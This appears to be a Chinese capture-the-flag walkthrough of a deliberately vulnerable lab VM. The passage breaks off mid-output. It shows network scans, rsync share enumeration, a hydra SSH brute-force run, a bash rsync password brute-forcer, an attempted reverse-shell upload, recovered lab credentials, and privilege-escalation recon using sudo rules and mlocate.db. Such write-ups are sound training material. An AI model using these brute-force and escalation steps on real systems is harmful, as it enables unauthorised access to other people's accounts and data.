![\"image-20250611150302682\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323626.png\")
<\/div>\n
![\"image-20250611224539405\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323627.png\")
<\/div>\n
![\"image-20250611150833860\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121323628.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nRustScan: allowing you to send UDP packets into the void 1200x faster than NMAP\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:873\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)\n| ssh-hostkey: \n| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F\/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff\/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15\/h5hBsS\/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT\/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9\/wPmo6RBeb1d5t11SP8R5UHyI\/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=\n| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F\/EIiQoIHE=\n| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-title: epages\n|_http-server-header: Apache\/2.4.62 (Debian)\n873\/tcp open rsync syn-ack ttl 64 (protocol version 31)\nMAC Address: 08:00:27:D3:C0:D5 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP -x php html txt 2>\/dev\/null\n\n404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200 GET 75l 138w 2232c http:\/\/192.168.10.101\/\n200 GET 75l 138w 2232c http:\/\/192.168.10.101\/index.html\n[####################] - 23s 120000\/120000 0s found:2 errors:0 \n[####################] - 22s 120000\/120000 5477\/s http:\/\/192.168.10.101\/ <\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20250611151233160\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u654f\u611f\u76ee\u5f55\u63a2\u6d4b<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ nmap -sV --script "rsync-list-modules" -p 873 $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-11 03:14 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00074s latency).\n\nPORT STATE SERVICE VERSION\n873\/tcp open rsync (protocol version 31)\n| rsync-list-modules: \n| \n| public Public Files\n|_ epages Secret Documents\nMAC Address: 08:00:27:D3:C0:D5 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 0.57 seconds<\/code><\/pre>\n\u6216\u8005msf\u4e5f\u884c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ msfconsole -q \nmsf6 > use auxiliary\/scanner\/rsync\/modules_list\nmsf6 auxiliary(scanner\/rsync\/modules_list) > options\n\nModule options (auxiliary\/scanner\/rsync\/modules_list):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOSTS yes The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n RPORT 873 yes The target port (TCP)\n TEST_AUTHENTICATION true yes Test if the rsync module requires authentication\n THREADS 1 yes The number of concurrent threads (max one per host)\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/rsync\/modules_list) > set rhosts 192.168.10.101\nrhosts => 192.168.10.101\nmsf6 auxiliary(scanner\/rsync\/modules_list) > run\n[+] 192.168.10.101:873 - 2 rsync modules found: public, epages\n[*] 192.168.10.101:873 - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n\u4e0b\u8f7d\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync $IP:: \n\npublic Public Files\nepages Secret Documents\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync -av --list-only rsync:\/\/$IP\/public \n\nreceiving incremental file list\ndrwxr-xr-x 4,096 2025\/05\/15 12:35:39 .\n-rw-r--r-- 433 2025\/05\/15 12:35:39 todo.list\n\nsent 20 bytes received 69 bytes 178.00 bytes\/sec\ntotal size is 433 speedup is 4.87\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync -av rsync:\/\/192.168.10.101:873\/public\/todo.list .\/todo.list \n\nreceiving incremental file list\ntodo.list\n\nsent 43 bytes received 528 bytes 1,142.00 bytes\/sec\ntotal size is 433 speedup is 0.76\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ cat todo.list \nTo-Do List\n=========\n\n1. sabulaji: Remove private sharing settings\n - Review all shared files and folders.\n - Disable any private sharing links or permissions.\n\n2. sabulaji: Change to a strong password\n - Create a new password (minimum 12 characters, include uppercase, lowercase, numbers, and symbols).\n - Update the password in the system settings.\n - Ensure the new password is not reused from other accounts.\n=========<\/code><\/pre>\n\u7206\u7834\u662f\u79cd\u827a\u672f<\/h3>\n
\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u5f31\u5bc6\u7801\uff1f\u6216\u8005rsync<\/code>\u7684\u5f31\u5bc6\u7801\uff1f<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync -av --list-only rsync:\/\/$IP\/epages \n\nPassword: \n@ERROR: auth failed on module epages\nrsync error: error starting client-server protocol (code 5) at main.c(1850) [Receiver=3.4.0]<\/code><\/pre>\n\u7a81\u7136\u6ce8\u610f\u5230index.php<\/code>\u540d\u5b57\u5373\u4e3a\uff1a<\/p>\n<\/div><\/p>\n\u6240\u4ee5\u8fd9\u91cc\u53ef\u80fd\u5c31\u662f\u90a3\u4e2a\u4e0d\u53ef\u8bfb\u7684\u6587\u4ef6\u3002<\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\u6587\u4ef6\uff0c\u4f46\u662f\u90fd\u5931\u8d25\u4e86\uff0c\u663e\u793a\u6743\u9650\u53ea\u8bfb\uff1a<\/p>\n
rsync -av .\/revshell.php rsync:\/\/192.168.10.101:873\/public<\/code><\/pre>\n\u5c1d\u8bd5\u8fc7\u7206\u7834ssh\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u548b\u6574\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ grep -P '^(?=.*[a-z])(?=.*[A-Z])(?=.*\\d)(?=.*[\\W_]).{12,}$' \/usr\/share\/wordlists\/rockyou.txt > pass\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ hydra -l sabulaji -P pass -f ssh:\/\/$IP:22\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-11 03:51:50\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 11889 login tries (l:1\/p:11889), ~744 tries per task\n[DATA] attacking ssh:\/\/192.168.10.101:22\/\n[STATUS] 212.00 tries\/min, 212 tries in 00:01h, 11682 to do in 00:56h, 11 active\n<\/code><\/pre>\n\u7206\u4e86\u534a\u5929\u6ca1\u51fa\u6765\uff0c\u611f\u89c9\u662f\u6ca1\u620f\u4e86\uff0c\u5148\u4e0d\u7ba1\u8fd9\u4e2a\u4e86\u3002\u3002\u3002\u5c1d\u8bd5\u7206\u7834rsync<\/code>\uff1a<\/p>\n# Auth:hgbe02\n# brute rysnc pass\n\n#!\/bin\/bash\ndict="\/usr\/share\/wordlists\/rockyou.txt"\nrsync_module="rsync:\/\/sabulaji@192.168.10.107:873\/epages\/"\n\nwhile IFS= read -r pass || [[ -n "$pass" ]]; do\n sshpass -p "$pass" rsync --list-only "$rsync_module" &>\/dev\/null\n exit_code=$?\n\n if [[ $exit_code -eq 0 ]]; then\n echo -e "\\r\\033[K[+] \u5bc6\u7801\u7206\u7834\u6210\u529f: '$pass'"\n exit 0\n elif [[ $exit_code -eq 5 ]]; then\n echo -ne "\\r\\033[K[-] \u5c1d\u8bd5\u5bc6\u7801: '$pass',\u8ba4\u8bc1\u5931\u8d25"\n fi\ndone < "$dict"\n\necho -e "\\r\\033[K[\u274c] \u6240\u6709\u5bc6\u7801\u5c1d\u8bd5\u5931\u8d25"\nexit 1<\/code><\/pre>\n\u7206\u7834\u8fc7\u6162\uff0c\u6ca1\u529e\u6cd5\u4e86\u3002\u3002\u3002\u6211\u8fd9\u91cc\u72af\u89c4\u4e86\uff0c\u76f4\u63a5\u4f7f\u7528\u5df2\u77e5\u7684\u5bc6\u7801\u8fdb\u884c\u6d4b\u8bd5\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ .\/exp.sh \n[+] \u5bc6\u7801\u7206\u7834\u6210\u529f: 'admin123'<\/code><\/pre>\n\u7206\u7834\u7ed3\u679c\u5373\u4e3aadmin123<\/code>\uff0c\u53e6\u4e00\u65b9\u9762\u53ef\u4ee5\u8bf4\u662f\u9009\u62e9\u5927\u4e8e\u52aa\u529b\u4e86\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sudo grep -Pnr '^admin123$' \/usr\/share\/wordlists\/seclists \n\/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames-dup.txt:195811:admin123\n\/usr\/share\/wordlists\/seclists\/Usernames\/Honeypot-Captures\/multiplesources-users-fabian-fingerle.de.txt:776:admin123\n\/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt:195811:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/cirt-default-passwords.txt:535:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Malware\/conficker.txt:71:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Cracked-Hashes\/milw0rm-dictionary.txt:25371:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/honeynet2.txt:1247:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/alleged-gmail-passwords.txt:721281:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/Lizard-Squad.txt:440:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/muslimMatch.txt:28921:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/md5decryptor-uk.txt:1369681:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/phpbb-cleaned-up.txt:4982:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/phpbb.txt:4982:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/000webhost.txt:259:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/Ashley-Madison.txt:72993:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/carders.cc.txt:86:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/fortinet-2021_passwords.txt:13227:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/fortinet-2021_passwords.txt:13229:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/honeynet.txt:1243:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords-dup.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/WiFi-WPA\/probable-v2-wpa-top4800.txt:514:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Honeypot-Captures\/multiplesources-passwords-fabian-fingerle.de.txt:30292:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/mssql-passwords-nansh0u-guardicore.txt:131444:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords-1000000.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords-100000.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/probable-v2_top-12000.txt:1772:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/darkweb2017_top-10000.txt:1852:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/10-million-password-list-top-100000.txt:15596:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-10000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/10-million-password-list-top-1000000.txt:15589:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/100k-most-used-passwords-NCSC.txt:1703:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-100000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/2023-200_most_used_passwords.txt:18:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-1000000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/best1050.txt:117:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/worst-passwords-2017-top100-slashdata.txt:82:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Hindi_Pwdb_common-password-list-top-150.txt:130:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Spanish_1000-common-usernames-and-passwords.txt:643:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Spanish_1000-common-usernames-and-passwords.txt:660:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list-top-1000000.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list-top-1000000.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list-top-100000.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list-top-10000.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Dutch_common-pasword-list.txt:1831:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Dutch_common-pasword-list.txt:3063486:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list-top-10000.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/French-common-password-list-top-20000.txt:7006:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list-top-100000.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-10000000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-1000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Default-Credentials\/default-passwords.txt:192:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/scraped-JWT-secrets.txt:3924:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-directories.txt:11393:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories-lowercase.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-directories-lowercase.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/big.txt:1828:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-words.txt:18312:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-words-lowercase.txt:16180:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-directories-lowercase.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/combined_words.txt:17444:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-words-lowercase.txt:16180:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-directories.txt:11401:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-words-lowercase.txt:16180:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/combined_directories.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-words.txt:18316:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt:11393:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-words.txt:18312:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/combined_subdomains.txt:15845:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/dns-Jhaddix.txt:183603:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/bug-bounty-program-subdomains-trickest-inventory.txt:1504322:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/FUZZSUBS_CYFARE_1.txt:67672:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt:37373:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/n0kovo_subdomains.txt:308802:admin123\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sudo grep -Pnr "^admin123$" \/usr\/share\/wordlists\/ \n\/usr\/share\/wordlists\/sedFgdqzB:90005:admin123\n\/usr\/share\/wordlists\/sedmiwcTK:90005:admin123\n\/usr\/share\/wordlists\/sedWu5JTa:90005:admin123\n\/usr\/share\/wordlists\/sedul1f3P:90005:admin123\n\/usr\/share\/wordlists\/sedxbsS8x:90005:admin123\n\/usr\/share\/wordlists\/sedB8Yl9K:90005:admin123\n\/usr\/share\/wordlists\/sedpsclOv:90005:admin123\n\/usr\/share\/wordlists\/rockyou.txt:90006:admin123\n\/usr\/share\/wordlists\/sedzsmSh5:90005:admin123\n\/usr\/share\/wordlists\/sedWqMndH:90005:admin123\n\/usr\/share\/wordlists\/sedfwWfV9:90005:admin123<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u8fdb\u4e00\u6b65\u6d4b\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sshpass -p "admin123" rsync -av rsync:\/\/sabulaji@192.168.10.107:873\/epages\/ 2>\/dev\/null \n\nreceiving incremental file list\ndrwxr-xr-x 4,096 2025\/05\/15 12:17:03 .\n-rw-r--r-- 13,312 2025\/05\/15 12:17:03 secrets.doc\n\nsent 20 bytes received 73 bytes 186.00 bytes\/sec\ntotal size is 13,312 speedup is 143.14\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sshpass -p "admin123" rsync -av rsync:\/\/sabulaji@192.168.10.107:873\/epages\/secrets.doc secrets.doc 2>\/dev\/null\n\nreceiving incremental file list\nsecrets.doc\n\nsent 43 bytes received 13,410 bytes 8,968.67 bytes\/sec\ntotal size is 13,312 speedup is 0.99<\/code><\/pre>\n\u6253\u5f00\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u5230\u4e86\u82e5\u53e3\u4ee4\uff1awelcome:P@ssw0rd123!<\/code>\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nwelcome@Sabulaji:~$ whoami;id\nwelcome\nuid=1000(welcome) gid=1000(welcome) groups=1000(welcome),123(mlocate)\nwelcome@Sabulaji:~$ sudo -l\nMatching Defaults entries for welcome on Sabulaji:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser welcome may run the following commands on Sabulaji:\n (sabulaji) NOPASSWD: \/opt\/sync.sh\nwelcome@Sabulaji:~$ cat \/opt\/sync.sh\n#!\/bin\/bash\n\nif [ -z $1 ]; then\n echo "error: note missing"\n exit\nfi\n\nnote=$1\n\nif [[ "$note" == *"sabulaji"* ]]; then\n echo "error: forbidden"\n exit\nfi\n\ndifference=$(diff \/home\/sabulaji\/personal\/notes.txt $note)\n\nif [ -z "$difference" ]; then\n echo "no update"\n exit\nfi\n\necho "Difference: $difference"\n\ncp $note \/home\/sabulaji\/personal\/notes.txt\n\necho "[+] Updated."<\/code><\/pre>\n\u8bfb\u53d6mlocate.db\u5229\u7528\u811a\u672c\u8bfb\u53d6\u6587\u4ef6<\/h3>\n
\u6ce8\u610f\u5230\u7528\u6237\u591a\u4e86\u4e00\u4e2a\u6743\u9650123(mlocate)<\/code>\uff0c\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\uff1a<\/p>\n\n\ud83d\udd10 1. mlocate.db<\/code> \u6570\u636e\u5e93\u7684\u6743\u9650\u8bbe\u7f6e<\/strong><\/h3>\n\n- \n
\u6587\u4ef6\u6743\u9650mlocate.db<\/code><\/p>\n\u9ed8\u8ba4\u4f4d\u4e8e\/var\/lib\/mlocate\/<\/code>\uff0c\u6743\u9650\u4e3a640\uff08-rw-r-----\uff09<\/strong><\/p>\n\n- \u5c5e\u4e3b<\/strong>\uff1a
root<\/code>\uff08\u62e5\u6709\u8bfb\u5199\u6743\u9650\uff09\u3002<\/li>\n- \u5c5e\u7ec4<\/strong>\uff1a
mlocate<\/code> \u6216 slocate<\/code>\uff08\u62e5\u6709\u53ea\u8bfb\u6743\u9650\uff09\u3002<\/li>\n- \u5176\u4ed6\u7528\u6237<\/strong>\uff1a\u65e0\u6743\u9650\uff08\u65e0\u6cd5\u76f4\u63a5\u8bfb\u53d6\u6570\u636e\u5e93\uff09\u3002<\/li>\n<\/ul>\n
$ ls -l \/var\/lib\/mlocate\/mlocate.db\n-rw-r----- 1 root mlocate 1838850 Jan 20 04:29 mlocate.db<\/code><\/pre>\n<\/li>\n<\/ul>\n
\n\u2699\ufe0f 2. locate<\/code> \u547d\u4ee4\u7684 SGID \u6743\u9650<\/strong><\/h3>\n\n- \n
SGID \u4f5c\u7528\uff1a\u5f53\u666e\u901a\u7528\u6237\u6267\u884clocate<\/code><\/p>\n\u65f6\uff0c\u8fdb\u7a0b\u4f1a\u4e34\u65f6\u4ee5 mlocate\u7ec4\u8eab\u4efd<\/strong>\u8fd0\u884c\uff08\u800c\u975e\u7528\u6237\u539f\u5c5e\u7ec4\uff09<\/p>\n$ ls -l \/usr\/bin\/locate\nlrwxrwxrwx 1 root root 24 \/usr\/bin\/locate -> \/etc\/alternatives\/locate\n$ ls -l \/usr\/bin\/mlocate\n-rwxr-sr-x 1 root mlocate 34452 \/usr\/bin\/mlocate # SGID \u4f4d\uff08r-s \u4e2d\u7684 's'\uff09<\/code><\/pre>\n<\/li>\n- \n
\u6743\u9650\u7ee7\u627f<\/strong>\uff1a\u56e0 mlocate<\/code> \u7ec4\u5bf9\u6570\u636e\u5e93\u6709\u8bfb\u6743\u9650\uff08r--<\/code>\uff09\uff0c\u7528\u6237\u901a\u8fc7\u547d\u4ee4\u95f4\u63a5\u83b7\u5f97\u8bbf\u95ee\u6743\u3002<\/p>\n<\/li>\n<\/ul>\n<\/blockquote>\n\u5c1d\u8bd5\u5b9a\u4f4d\u4e00\u4e0b\u4e0a\u8ff0\u811a\u672c\u7684\u7981\u6b62\u5b57\u7b26\uff1a<\/p>\n
welcome@Sabulaji:~$ locate *sabulaji*\n\/home\/sabulaji\n\/home\/sabulaji\/.bash_history\n\/home\/sabulaji\/.bash_logout\n\/home\/sabulaji\/.bashrc\n\/home\/sabulaji\/.profile\n\/home\/sabulaji\/personal\nwelcome@Sabulaji:~$ cat \/var\/lib\/mlocate\/mlocate.db | grep abulaji\nBinary file (standard input) matches\nwelcome@Sabulaji:~$ hexdump -C \/var\/lib\/mlocate\/mlocate.db | grep -i sabulaji\n00008cb0 00 2f 68 6f 6d 65 2f 73 61 62 75 6c 61 6a 69 00 |.\/home\/sabulaji.|\n00008d10 2f 73 61 62 75 6c 61 6a 69 2f 70 65 72 73 6f 6e |\/sabulaji\/person|\nwelcome@Sabulaji:~$ strings \/var\/lib\/mlocate\/mlocate.db | grep -i sabulaji\nsabulaji\n\/home\/sabulaji\n\/home\/sabulaji\/personal\nwelcome@Sabulaji:\/tmp$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\nwelcome\nsabulaji\nwelcome@Sabulaji:\/tmp$ ls -la \/home\/\ntotal 16\ndrwxr-xr-x 4 root root 4096 May 15 12:39 .\ndrwxr-xr-x 18 root root 4096 Mar 18 20:37 ..\ndrwxr-xr-x 3 sabulaji sabulaji 4096 May 16 01:22 sabulaji\ndrwxr-xr-x 2 welcome welcome 4096 May 16 01:21 welcome\nwelcome@Sabulaji:\/tmp$ cat -n log | grep laji\n 2070 sabulaji\n 2072 \/home\/sabulaji\n 2078 